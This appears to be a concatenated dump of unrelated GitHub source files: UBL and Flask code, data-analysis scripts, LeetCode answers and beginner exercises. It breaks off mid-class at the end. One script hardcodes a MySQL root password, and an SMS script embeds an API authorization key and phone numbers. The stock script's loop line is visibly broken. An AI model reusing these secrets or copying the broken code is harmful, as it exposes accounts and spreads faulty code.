TransportProgressStatusRequestDocumentReference\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import TransportSchedule\nfrom ubl.models.common.ubl_common_basic_components_2_1 import CityName\nfrom ubl.models.common.ubl_common_basic_components_2_1 import ElectronicMail\nfrom ubl.models.common.ubl_common_basic_components_2_1 import Id\nfrom ubl.models.common.ubl_common_basic_components_2_1 import IdentificationCode\nfrom ubl.models.common.ubl_common_basic_components_2_1 import JourneyId\nfrom ubl.models.common.ubl_common_basic_components_2_1 import LocationTypeCode\nfrom ubl.models.common.ubl_common_basic_components_2_1 import Name\nfrom ubl.models.common.ubl_common_basic_components_2_1 import RegistrationNationalityId\nfrom ubl.models.common.ubl_common_basic_components_2_1 import ReliabilityPercent\nfrom ubl.models.common.ubl_common_basic_components_2_1 import SequenceNumeric\nfrom ubl.models.common.ubl_common_basic_components_2_1 import StreetName\nfrom ubl.models.common.ubl_common_basic_components_2_1 import Telephone\nfrom ubl.models.common.ubl_common_basic_components_2_1 import TrainId\nfrom ubl.models.common.ubl_common_basic_components_2_1 import TransportMeansTypeCode\nfrom ubl.models.common.ubl_common_basic_components_2_1 import UblversionId\nfrom ubl.models.maindoc.ubl_transport_progress_status_2_1 import TransportProgressStatus\nfrom xsdata.models.datatype import XmlDate\nfrom xsdata.models.datatype import XmlTime\n\n\nobj = TransportProgressStatus(\n ublversion_id=UblversionId(\n value=\"2.1\"\n ),\n id=Id(\n value=\"TPSR_1\"\n ),\n issue_date=XmlDate(2011, 10, 3),\n issue_time=XmlTime(14, 30, 10, 0, 60),\n status_available_indicator=True,\n sender_party=SenderParty(\n party_identification=[\n PartyIdentification(\n id=Id(\n value=\"4058673821325\",\n scheme_name=\"GLN\",\n scheme_agency_name=\"GS1\"\n )\n ),\n ],\n party_name=[\n PartyName(\n name=Name(\n value=\"ARRIVA\"\n )\n ),\n ],\n contact=Contact(\n name=Name(\n value=\"SomeName\"\n ),\n telephone=Telephone(\n value=\"+49450557888\"\n ),\n electronic_mail=ElectronicMail(\n value=\"SomeName@arriva.de\"\n )\n )\n ),\n receiver_party=ReceiverParty(\n party_identification=[\n PartyIdentification(\n id=Id(\n value=\"4058673827641\",\n scheme_name=\"GLN\",\n scheme_agency_name=\"GS1\"\n )\n ),\n ],\n party_name=[\n PartyName(\n name=Name(\n value=\"NECOSS\"\n 
)\n ),\n ],\n contact=Contact(\n name=Name(\n value=\"SomeName\"\n ),\n telephone=Telephone(\n value=\"+49450557000\"\n ),\n electronic_mail=ElectronicMail(\n value=\"SomeName@necoss.de\"\n )\n )\n ),\n source_issuer_party=SourceIssuerParty(\n party_identification=[\n PartyIdentification(\n id=Id(\n value=\"4058673821325\",\n scheme_name=\"GLN\",\n scheme_agency_name=\"GS1\"\n )\n ),\n ],\n party_name=[\n PartyName(\n name=Name(\n value=\"ARRIVA\"\n )\n ),\n ],\n contact=Contact(\n name=Name(\n value=\"SomeName\"\n ),\n telephone=Telephone(\n value=\"+49450557888\"\n ),\n electronic_mail=ElectronicMail(\n value=\"SomeName@arriva.de\"\n )\n )\n ),\n transport_progress_status_request_document_reference=TransportProgressStatusRequestDocumentReference(\n id=Id(\n value=\"TPS_1\",\n scheme_name=\"MovementReferenceNumber\"\n )\n ),\n transport_means=TransportMeans(\n journey_id=JourneyId(\n value=\"RHamBrem\"\n ),\n registration_nationality_id=RegistrationNationalityId(\n value=\"DE\"\n ),\n transport_means_type_code=TransportMeansTypeCode(\n value=\"230\"\n ),\n rail_transport=RailTransport(\n train_id=TrainId(\n value=\"RID01235\"\n )\n )\n ),\n transport_schedule=[\n TransportSchedule(\n sequence_numeric=SequenceNumeric(\n value=Decimal(\"1\")\n ),\n reliability_percent=ReliabilityPercent(\n value=Decimal(\"80\")\n ),\n status_location=StatusLocation(\n location_type_code=LocationTypeCode(\n value=\"13\"\n ),\n address=Address(\n id=Id(\n value=\"4568763527610\",\n scheme_name=\"GLN\",\n scheme_agency_name=\"GS1\"\n ),\n street_name=StreetName(\n value=\"Ludwig-Erhard-Str. 15\"\n ),\n city_name=CityName(\n value=\"Bremen\"\n ),\n country=Country(\n identification_code=IdentificationCode(\n value=\"DE\"\n )\n )\n )\n ),\n estimated_arrival_transport_event=EstimatedArrivalTransportEvent(\n period=[\n Period(\n start_date=XmlDate(2011, 10, 3),\n start_time=XmlTime(18, 30, 10, 0, 60),\n end_date=XmlDate(2011, 10, 3),\n end_time=XmlTime(18, 35, 10, 0, 60)\n ),\n ]\n )\n ),\n ]\n)\n","repo_name":"tefra/xsdata-samples","sub_path":"ubl/samples/UBL-TransportProgressStatus-2.1-Example.py","file_name":"UBL-TransportProgressStatus-2.1-Example.py","file_ext":"py","file_size_in_byte":7198,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"70"}
+{"seq_id":"28213111929","text":"import pymysql\nimport matplotlib.pyplot as plt \nfrom matplotlib.font_manager import FontProperties\nplt.rcParams['font.sans-serif'] = ['SimHei']#中文标签正常使用\nconn = pymysql.connect(\n\thost='localhost',\n\tuser='root',\n\tpassword='wyh19990713',\n\tdatabase='stock',\n charset='utf8')\ncursor = conn.cursor() \nsql = \"select * from data where Date ='2019-3-18' or Date='2019-4-03'\"\ncursor.execute(sql)\nresults = cursor.fetchall()\nconditionStockName=[]\nconditionStockNumber=[]\ni=0\nk=0\nwhile(i0.1)&(finace>0.1)):\n\t\tconditionStockName.append(results[i][6])\n\t\tk=k+1\n\ti+=2\nprint(conditionStockName)\n","repo_name":"wyh196646/bupt-EE-computer-experiment","sub_path":"股票数据分析系统/需求3.py","file_name":"需求3.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"36970186426","text":"'''\n\"I am 25 years and 10 months old\nop: sum of int and avg\n35\n17.5\n\n\nAnjali25 is python4 Expert\n1time3 %times4\n'''\n\"\"\"\nstring = input().split()\nsum = 0\ncount = 0\nfor i in string:\n if(i.isdigit()):\n #print(i)\n sum = sum + int(i)\n count = count + 1\nprint(sum)\nprint(round((sum/count),2))\n\"\"\"\n#################################try with split each item and loop to find the integer in the string if the \n## string has an integer and continuos with a string or a space then the integer is considered\nstring = input().split()\nsum = 0\ncount = 0\n\n\ndef isdigit_fun(word):\n digit = 0\n for c in word:\n if(c.isdigit()):\n digit = digit*10 + int(c)\n return digit\n\n\n#print(string)\ndigi_list = []\nfor word in string:\n digit = isdigit_fun(word)\n if(digit != 0):\n digi_list.append(digit)\n#print(digi_list)\n\ncount = len(digi_list)\n\nfor i in digi_list:\n sum = sum + i\nprint(sum)\nprint(sum/count)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"maheshmahi30/Python_projects","sub_path":"sum_avg_int_in_string_2.py","file_name":"sum_avg_int_in_string_2.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19514399709","text":"# from flask import Flask, abort, jsonify, request, render_template\nfrom joblib import load\nfrom features import *\nimport json\nimport sys\n\npipeline = load('./pipeline.sav')\n# print(\"chchchchchcchcchchchc\")\n# # app = Flask(__name__)\n\n# @app.route('/analyze', methods=['POST'])\n# def analyze():\n\n# requestJson = request.get_json(force=True)\ncomments = list(sys.argv[1].split(\",\")) # requestJson['arr']\n# comments = json.loads(comments)\n# comments = [{'text': \"good\"}, {'text': \"bad\"}]\n# print(\"coo\", comments)\ngood = 0\nbad = 0\nfor comment in comments:\n query = comment\n query = remove_punctuation_stopwords_lemma(query)\n pred = pipeline.predict([query])\n if pred[0] == \"positive\":\n good += 1\n else:\n bad += 1\n # return jsonify({'good':good,'bad':bad})\n\nresp = {'good': good, 'bad': bad}\nprint(json.dumps(resp))\nsys.stdout.flush()\n# if __name__ == '__main__':\n# app.run(port=8080, debug=True)\n","repo_name":"amardeep5/nutrino","sub_path":"flas.py","file_name":"flas.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19520669981","text":"from typing import List\nclass Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n cur = 0\n for i in range(len(nums)):\n if nums[i] != 0:\n nums[cur] = nums[i]\n cur += 1\n for i in range(cur, len(nums)):\n nums[i] = 0","repo_name":"zhulf0804/Coding.Python","sub_path":"leetcode/283_移动零.py","file_name":"283_移动零.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"69"}
+{"seq_id":"18651660099","text":"import os\nimport re\n\nimport click\nfrom flask import Flask, request, jsonify, send_from_directory\n\nfrom api_account import account_api\nfrom api_admin import admin_api\nfrom api_course import course_api\nfrom api_material import material_api\nfrom api_meta import meta_api\nfrom api_my_submission import my_submission_api\nfrom api_my_team_submission import my_team_submission_api\nfrom api_submission import submission_api\nfrom api_task import task_api\nfrom api_team import team_api\nfrom api_term import term_api\nfrom api_message import message_api\nfrom auth_connect import oauth\nfrom models import db\nfrom services.account import AccountService, AccountServiceError\nfrom services.messsage import MessageService\nfrom utils import upload\nfrom utils.ip import IPTool\n\n\nclass MyFlask(Flask):\n _hashed_static_file_pattern = re.compile(r'^.+\\.[a-z0-9]{20}\\.\\w+$')\n _hashed_static_file_cache_timeout = 365 * 24 * 60 * 60 # 1 year\n _index_page_cache_timeout = 5 * 60 # 5 minutes\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.add_url_rule(\n self.static_url_path + '_/',\n endpoint='region_static',\n view_func=self.send_region_static_file\n )\n\n def send_static_file(self, filename):\n return self.send_region_static_file(filename, None)\n\n def send_region_static_file(self, filename, region):\n \"\"\"Identify hashed static files and send them with a longer cache timeout.\n For 'index.html', send it with a short cache timeout.\n For other static files, the default cache timeout is used.\n \"\"\"\n if not self.has_static_folder:\n raise RuntimeError('No static folder for this object')\n if filename == 'index.html':\n cache_timeout = self._index_page_cache_timeout\n elif self._hashed_static_file_pattern.fullmatch(filename):\n cache_timeout = self._hashed_static_file_cache_timeout\n else:\n cache_timeout = self.get_send_file_max_age(filename)\n\n static_folder = self.get_region_static_folder(region)\n return send_from_directory(static_folder, filename, cache_timeout=cache_timeout)\n\n def get_region_static_folder(self, region):\n if region: # use the static folder for this region\n static_folder = '%s_%s' % (self.static_folder, region)\n else: # use default static folder\n static_folder = self.static_folder\n return static_folder\n\n def get_request_region(self):\n detect_regions = self.config.get('DETECT_REQUEST_REGIONS')\n if detect_regions:\n ip = IPTool.get_client_ip(request)\n country_code = IPTool.get_ip_country(ip)\n if country_code:\n country_code = country_code.lower()\n if country_code in detect_regions:\n return country_code\n return None\n\n\napp = MyFlask(__name__)\napp.config.from_json('config.json')\n\ndb.init_app(app)\nupload.init_app(app)\nIPTool.init_app(app)\n\n# import logging\n# logging.basicConfig()\n# logging.getLogger('sqlalchemy.engine').setLevel(logging.INFO)\n\n\ndef _login_callback(user):\n try:\n AccountService.sync_user(user)\n db.session.commit()\n except AccountServiceError as e:\n return jsonify(msg=e.msg, detail=e.detail), 500\n\n\noauth.init_app(app, login_callback=_login_callback)\n\napp.register_blueprint(account_api, url_prefix='/api/account')\napp.register_blueprint(course_api, url_prefix='/api/courses')\napp.register_blueprint(term_api, url_prefix='/api/terms')\napp.register_blueprint(team_api, url_prefix='/api/teams')\napp.register_blueprint(task_api, url_prefix='/api/tasks')\napp.register_blueprint(material_api, url_prefix='/api/materials')\napp.register_blueprint(submission_api, 
url_prefix='/api/submissions')\napp.register_blueprint(my_submission_api, url_prefix='/api/my-submissions')\napp.register_blueprint(my_team_submission_api, url_prefix='/api/my-team-submissions')\napp.register_blueprint(message_api, url_prefix='/api/messages')\napp.register_blueprint(meta_api, url_prefix='/api/meta')\napp.register_blueprint(admin_api, url_prefix='/api/admin')\n\n\n@app.route('/')\n@app.route('/terms/')\n@app.route('/admin/')\n@oauth.requires_login\ndef get_index_page(path=''):\n region = app.get_request_region()\n return app.send_region_static_file('index.html', region)\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n for mime in request.accept_mimetypes:\n if mime[0] == 'text/html':\n break\n if mime[0] == 'application/json':\n return jsonify(msg='wrong url', detail='You have accessed an unknown location'), 404\n region = app.get_request_region()\n # in case we are building the front-end\n if not os.path.exists(os.path.join(app.get_region_static_folder(region), 'index.html')):\n return send_from_directory(app.root_path, 'building.html', cache_timeout=0), 503\n return app.send_region_static_file('index.html', region), 404\n\n\n@app.cli.command()\ndef create_db():\n db.create_all()\n\n\n@app.cli.command()\ndef init_db():\n MessageService.init_default_channels()\n db.session.commit()\n\n\n@app.cli.command()\n@click.option('-c', '--channel_name')\ndef init_email_subscriptions(channel_name: str):\n channel = None\n if channel_name is not None:\n channel = MessageService.get_channel_by_name(channel_name)\n\n for user in AccountService.get_all_users():\n MessageService.init_new_user_subscriptions(user, channel)\n db.session.commit()\n\n\n@app.cli.command()\ndef drop_db():\n db.drop_all()\n\n\nif __name__ == '__main__':\n app.run(host='localhost', port=8888)\n","repo_name":"tjumyk/submit","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12441262606","text":"# import required module\r\nimport requests\r\nimport json\r\n\r\n\r\ndef sendSMSToPatient(message=\"Thank you for contacting us. Your appointment has been scheduled successfully\"):\r\n # mention url\r\n url = \"https://www.fast2sms.com/dev/bulkV2\"\r\n\r\n # create a dictionary\r\n my_data = {\r\n # Your default Sender ID\r\n 'sender_id': 'FSTSMS',\r\n\r\n # Put your message here!\r\n 'message': message,\r\n\r\n 'language': 'english',\r\n 'route': 'p',\r\n\r\n # You can send sms to multiple numbers\r\n # separated by comma. ,8669416075,8530695473,8530426407\r\n 'numbers': '8669416075,8530695473,8530426407'\r\n }\r\n\r\n # create a dictionary\r\n headers = {\r\n 'authorization': 'AR2dqJ9iCS0Lux7kTwG1ZDa8UXeIVv3M5tOcpsQnFhmbofjzy6MDNf6FbB8sWzOCdQmG9u0VIeqTJ5Uc',\r\n 'Content-Type': \"application/x-www-form-urlencoded\",\r\n 'Cache-Control': \"no-cache\"\r\n }\r\n\r\n # make a post request\r\n response = requests.request(\"POST\",\r\n url,\r\n data=my_data,\r\n headers=headers)\r\n\r\n # load json data from source\r\n returned_msg = json.loads(response.text)\r\n\r\n # print to send message\r\n print(returned_msg['message'])\r\n","repo_name":"SnehalThakur/RASAChatbots","sub_path":"utils/fast2SmsService.py","file_name":"fast2SmsService.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"28960525646","text":"#\n# Autor: Michel\n#\n# Data: 18/12/2022\n\n# Para criar um jogo da velha em Python, você pode seguir os seguintes passos:\n\n# 1.\tCrie uma matriz 3x3 para armazenar os valores das células do jogo da velha. \n# Você pode inicializá-la com todas as células vazias, usando o caractere ' '.\n# 2.\tEscreva uma função que imprima o jogo da velha na tela. Ela deve \n# percorrer a matriz e imprimir os valores das células, separando-as por | e adicionando \n# linhas horizontais para cada linha da matriz.\n# 3.\tEscreva uma função que receba a posição (linha e coluna) e o \n# símbolo (X ou O) e atualize a matriz com o novo valor. Ela deve verificar se a posição é válida (ainda não está ocupada) antes de atualizar a matriz.\n# 4.\tEscreva uma função que verifique se alguém ganhou o jogo. Ela deve \n# verificar as linhas, colunas e diagonais da matriz para ver se algum dos\n# símbolos (X ou O) aparece em todas as células de uma linha, coluna ou diagonal.\n# 5.\tEscreva o loop principal do jogo, que deve solicitar ao \n# jogador qual é a próxima jogada e atualizar a matriz com o novo valor. O loop \n# deve continuar até que alguém ganhe ou até que não hajam mais células vazias (empate).\n\n\n# Jogo da velha em Python\n\n# Criando a matriz 3x3 vazia\nvelha = [[' ' for i in range(3)] for j in range(3)]\n# ou\n# velha = [[' ', ' ', ' '], [' ', ' ', ' '], [' ', ' ', ' ']]\n\n# Função para imprimir o jogo da velha\ndef imprime_velha():\n print('---------')\n for i in range(3):\n print(f'| {velha[i][0]} {velha[i][1]} {velha[i][2]} |')\n print('---------')\n\n# Função para atualizar a matriz do jogo da velha\ndef atualiza_velha(linha, coluna, símbolo):\n if velha[linha][coluna] != ' ':\n print('Posição já ocupada! Escolha outra.')\n return\n velha[linha][coluna] = símbolo\n\n# Função para verificar se alguém ganhou o jogo\ndef verifica_vitória(símbolo):\n # Verificando as linhas\n for i in range(3):\n if velha[i][0] == símbolo and velha[i][1] == símbolo and velha[i][2] == símbolo:\n # return True\n return f'Vencedor:'\n \n \n#####################################################################################\n\nimprime_velha()\natualiza_velha(0, 0, 'X')\nimprime_velha()\natualiza_velha(0, 1, 'X')\natualiza_velha(0, 2, 'X')\nimprime_velha()\nverifica_vitória('X')","repo_name":"MichelZero/JogoDaVelha","sub_path":"jogoVelha-funcao-01.py","file_name":"jogoVelha-funcao-01.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30995731160","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 24 10:43:25 2018\n\n@author: ernest\n\"\"\"\nimport random\n\ndef afegeixSinonim(diccionari, paraula, sinonim):\n if paraula not in diccionari.keys():\n diccionari[paraula] = [sinonim]\n \n else:\n if sinonim not in diccionari[paraula]:\n diccionari[paraula].append(sinonim)\n\n\n\ndef conversioSinonims(frase, diccionari):\n fraseToRet = []\n\n for word in frase:\n if word in diccionari.keys():\n if len(diccionari[word]) == 1:\n fraseToRet.append(diccionari[word][0])\n \n else:\n fraseToRet.append(diccionari[word][1])\n else:\n fraseToRet.append(word)\n \n return fraseToRet\n\n \n","repo_name":"gaspar44/Laboratorio-de-programacion","sub_path":"Python12/sinonims.py","file_name":"sinonims.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9499865840","text":"# script which creates a csv file containing players and theier average emotion by channel\nimport os\nimport sys\nimport re\nimport csv\nimport numpy as np\nimport math\nfrom scipy import stats\n\nwalk_dir = sys.argv[1]\n# save_dir = sys.argv[2]\nprint('walk_dir = ' + walk_dir)\nprint('walk_dir (absolute) = ' + os.path.abspath(walk_dir))\n\n\ndef getPlayerLogData(player_file_name):\n\n player_file_name = player_file_name[8:]\n imotions_id = player_file_name[:-4]\n\n player_log_data = []\n\n with open(\"Study6_logdata.csv\") as f:\n tsvin_log = csv.reader(f);\n\n for line in tsvin_log:\n if line[8] == imotions_id:\n player_log_data.append(line)\n\n return player_log_data\n\n\nCollectedMeansAndWeights = []\n\n# parse individual file\ndef getEmotionSummaryStats(file_path, Current_ID):\n #Cutt os file path away from file ID for recording\n m_f_name = re.search('([^\\\\\\\\]+)$', file_path)\n\n new_file_name = ''\n\n if (m_f_name):\n new_file_name = m_f_name.group(0)\n\n level_4_start_time = 0\n\n player_log_data = getPlayerLogData(new_file_name)\n for line in player_log_data:\n if(int(line[2]) == 4):\n level_4_start_time = float(line[3])\n\n #open current log file\n with open(file_path) as f:\n tsvin = csv.reader(f, delimiter='\\t');\n\n\n #filter data for columns with floats and rows that are defined\n #NOTE: Should reject files under a certain threshold of data.\n\n imotions_tsv_sliced = []\n imotions_tsv_unsliced = []\n\n undefined_frame_indexs = []\n\n line_count = 0\n for line in tsvin:\n if (line_count < 6):\n pass\n\n else:\n for i in range (19, 83):\n if line[i]:\n line[i] = float(line[i])\n if line[19] and (float(line[13]) > level_4_start_time):\n imotions_tsv_sliced.append(line[19:83])\n imotions_tsv_unsliced.append(line)\n elif (float(line[13]) > level_4_start_time):\n undefined_frame_indexs.append(line_count);\n imotions_tsv_unsliced.append(line)\n\n line_count += 1\n\n #Create Numpy array\n numpy_imotions_tsv = np.array(imotions_tsv_sliced)\n\n mean = np.mean(numpy_imotions_tsv, axis=0)\n #standard_deviations = np.std(numpy_imotions_tsv, axis=0)\n\n cur_row = [\"Player_\" + str(Current_ID), new_file_name, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n if isinstance(mean, np.ndarray) and len(imotions_tsv_sliced) > 5:\n for i in range (0, 12):\n cur_row[i + 2] = mean[i * 2]\n\n #ignore mean calculations that did not work (bad file or didnt reach last level)\n if(cur_row[3] != 0):\n CollectedMeansAndWeights.append(cur_row)\n\n#Open up each log file from the given study\nfor root, subdirs, files in os.walk(walk_dir):\n # print('--\\nroot = ' + root)\n # list_file_path = os.path.join(root, 'my-directory-list.txt')\n # print('list_file_path = ' + list_file_path)\n\n # with open(list_file_path, 'rb') as list_file:\n # for subdir in subdirs:\n # print('\\t- subdirectory ' + subdir)\n file_count = 1\n\n for filename in files:\n file_path = os.path.join(root, filename)\n\n if \".tsv\" in filename:\n print(file_path)\n getEmotionSummaryStats(file_path, file_count)\n file_count = file_count + 1\n\n print('Total FIles Oppend: ' + str(file_count))\n\n###########################################################################\n#Calculate Average Emotions accross all players by progression\n###########################################################################\n\naverages_p0 = []\naverages_p1 = []\n\nsum_rows_p0 = 0\nsum_rows_p1 = 0\n\nfor row in CollectedMeansAndWeights:\n #Determine which progression this row belongs too.\n player_progression = 2\n\n 
player_log_data = getPlayerLogData(row[1])\n\n player_progression = int(player_log_data[0][1])\n\n if(player_progression == 0):\n sum_rows_p0 += 1\n\n elif(player_progression == 1):\n sum_rows_p1 += 1\n\n else:\n print(\"error, imotions dump not found in log data.\")\n sys.exit()\n\n #Add to the correct sum array\n for i in range(0, 12):\n if(player_progression == 0):\n averages_p0.append(row[2:])\n\n elif(player_progression == 1):\n averages_p1.append(row[2:])\n\n\n#compute final averages\nfinal_averages_p0 = np.mean(averages_p0, axis=0)\nfinal_averages_p1 = np.mean(averages_p1, axis=0)\n\nt_test = stats.ttest_ind(averages_p0, averages_p1, axis=0)\n\n#Array of tags for printing\nchannels = ['\"Joy Evidence\"', '\"Anger Evidence\"', '\"Surprise Evidence\"', '\"Fear Evidence\"', '\"Contempt Evidence\"', '\"Disgust Evidence\"', '\"Sadness Evidence\"', '\"Confusion Evidence\"', '\"Frustration Evidence\"', '\"Neutral Evidence\"', '\"Positive Evidence\"', '\"Negative Evidence\"']\n\n#Print out final statistics\nprint(\"Averages for progression 0:\")\nfor i in range(0, len(final_averages_p0)):\n print(\"Average of \" + channels[i] + \" Equals: \" + str(final_averages_p0[i]))\n\nprint(\"Averages for progression 1:\")\nfor i in range(0, len(final_averages_p1)):\n print(\"Average of \" + channels[i] + \" Equals: \" + str(final_averages_p1[i]))\n\nprint(\"t-test Results by emotion\")\nfor i in range(0, len(final_averages_p1)):\n print(\"t-test result of \" + channels[i] + \" results: t-statistic: \" + str(t_test[0][i]) + \", p-value: \" + str(t_test[1][i]))","repo_name":"Mistymush/Eukaryote-Research","sub_path":"AverageEmotionsByLevel.py","file_name":"AverageEmotionsByLevel.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20501583929","text":"# @Date : 23:12 04/04/2020\n# @Author : ClassicalPi\n# @FileName: 5362.py\n# @Software: PyCharm\nimport collections\nclass Solution:\n def canConstruct(self, s: str, k: int) -> bool:\n if k>len(s):\n return False\n elif k==len(s):\n return True\n else:\n dic=collections.Counter(s)\n odd=0\n even=0\n for i in dic.values():\n if i%2==0:\n even+=1\n else:\n odd+=1\n while k>1:\n if odd>0:\n k-=1\n odd-=1\n continue\n else:\n k-=1\n even-=1\n odd+=1\n return (odd==0 or odd==1)\n\nif __name__ == '__main__':\n s=Solution()\n print(s.canConstruct(\"hdafhdajskdajsfbajhfawkfhawdhaiw\",20))","repo_name":"GuoYunZheSE/Leetcode","sub_path":"Contest/04042020/5362/5362.py","file_name":"5362.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"20120244077","text":"from typing import (\n List,\n)\n\nclass MinimumSizeSubarraySum:\n \"\"\"\n @param nums: an array of integers\n @param s: An integer\n @return: an integer representing the minimum size of subarray\n \"\"\"\n def minimum_size(self, nums: List[int], s: int) -> int:\n if not nums:\n return -1\n j, sum = 0, 0\n min_length = float('inf')\n for i in range(len(nums)):\n while j < len(nums) and sum < s:\n sum += nums[j]\n j += 1\n if sum >= s:\n min_length = min(j - i, min_length)\n sum -= nums[i]\n return min_length if min_length != float('inf') else -1\n\n\n def minimum_size2(self, nums: List[int], s: int) -> int:\n presum = self.get_prefix_sum(nums)\n min_size = float('inf')\n for start in range(len(nums)):\n end = self.get_end_of_subarray(presum, start, s)\n if presum[end + 1] - presum[start] >= s:\n min_size = min(end - start + 1, min_size)\n return min_size if min_size != float('inf') else -1\n\n def get_end_of_subarray(self, presum, start, sum):\n left, right = start, len(presum) - 2\n while left + 1 < right:\n mid = (left + right) // 2\n if presum[mid + 1] - presum[start] >= sum:\n right = mid\n else:\n left = mid\n if presum[left + 1] - presum[start] >= sum:\n return left\n return right\n\n\n def get_prefix_sum(self, nums):\n presum = [0]\n for num in nums:\n presum.append(presum[-1] + num)\n return presum\n","repo_name":"entingwu/AlgorithmPython","sub_path":"PrefixSum/MinimumSizeSubarraySum.py","file_name":"MinimumSizeSubarraySum.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"311756646","text":"\"\"\"notifications\n\nRevision ID: 53768f0a4850\nRevises: eecf30892d0e\nCreate Date: 2019-08-06 22:15:04.400982\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '53768f0a4850'\ndown_revision = 'eecf30892d0e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('notification_subscriptions',\n sa.Column('member', sa.String(length=36), nullable=True),\n sa.Column('freshman_username', sa.String(length=10), nullable=True),\n sa.Column('token', sa.String(length=256), nullable=False),\n sa.ForeignKeyConstraint(['freshman_username'], ['freshman.rit_username'], ),\n sa.PrimaryKeyConstraint('token')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('notification_subscriptions')\n # ### end Alembic commands ###\n\n","repo_name":"ComputerScienceHouse/packet","sub_path":"migrations/versions/53768f0a4850_notifications.py","file_name":"53768f0a4850_notifications.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"69"}
+{"seq_id":"22632553511","text":"#Added by Jan Odenthal, University of Heidelberg, odenthal@stud.uni-heidelberg.de\r\n#Commissioned by Universitätsklinikum Heidelberg, Klinik für Allgemein-, Viszeral- und Transplantationschirurgie\r\n\r\nfrom HyperGuiModules.utility import *\r\nfrom HyperGuiModules.constants import *\r\nfrom tkinter import filedialog, messagebox\r\nfrom PIL import Image, ImageDraw\r\nimport numpy as np\r\nimport os\r\nimport glob\r\nimport shutil\r\nfrom distutils.dir_util import copy_tree\r\n\r\n\r\nclass BP:\r\n def __init__(self, bp_frame):\r\n self.root = bp_frame\r\n \r\n #Lists\r\n self.data_cube_paths = []\r\n self.sub_dirs = []\r\n \r\n # GUI\r\n self.select_data_cube_button = None\r\n self.select_output_dir_button = None\r\n self.render_data_cube_button = None\r\n self.selection_listbox = None\r\n self.data_cube_path_label = None\r\n self.output_dir_label = None\r\n self.delete_button = None\r\n self.data_cube_path_label = None\r\n self.path_label = None\r\n self.save_label = None\r\n\r\n self.original_image_graph = None\r\n self.original_image_data = None\r\n self.original_image = None\r\n self.image_array = None\r\n\r\n self.original_image_graph_r = None\r\n self.original_image_data_r = None\r\n self.original_image_r = None\r\n self.image_array_r = None\r\n\r\n self.tif_save_path_end = None\r\n self.current_dc_path = None\r\n \r\n self.mask_raw = None\r\n \r\n self.idx_dict = dict({0:0})\r\n \r\n self._init_widget()\r\n\r\n\r\n # ---------------------------------------------- UPDATER AND GETTERS ----------------------------------------------\r\n \r\n\r\n def get_selected_data_cube_path(self):\r\n index = self.selection_listbox.curselection()[0]\r\n return self.data_cube_paths[index]\r\n\r\n def get_selected_data_paths(self):\r\n selection = self.selection_listbox.curselection()\r\n selected_data_paths = [self.data_cube_paths[self.idx_dict[i]] for i in selection]\r\n return selected_data_paths\r\n\r\n def update_original_image(self, original_image_data):\r\n self.original_image_data = original_image_data\r\n self._build_original_image(self.original_image_data)\r\n self._draw_points()\r\n \r\n def __update_selected_data_cube(self, event):\r\n if len(self.selection_listbox.curselection())>0:\r\n dc_path = self.get_selected_data_cube_path()\r\n if self.current_dc_path is not self.selection_listbox.curselection()[0]:\r\n if len(self.selection_listbox.curselection())>0:\r\n self.current_dc_path = self.selection_listbox.curselection()[0]\r\n else:\r\n dc_path = self.data_cube_paths[0]\r\n self.current_dc_path = 0\r\n img = Image.open(dc_path)\r\n data1 = np.array(img)\r\n if len(glob.glob(os.path.dirname(dc_path) + \"/*after*\"))>0:\r\n img = Image.open(glob.glob(os.path.dirname(dc_path) + \"/*after*\")[0])\r\n data2 = np.array(img)\r\n else:\r\n data2 = np.zeros((640,480,3))\r\n self._build_original_image_left(data1)\r\n self._build_original_image_right(data2)\r\n \r\n # ------------------------------------------------ INITIALIZATION ------------------------------------------------\r\n\r\n def _init_widget(self):\r\n self._build_selection_box()\r\n self._build_original_image_left(self.original_image_data)\r\n self._build_original_image_right(self.original_image_data)\r\n #self._build_select_superdir_button()\r\n 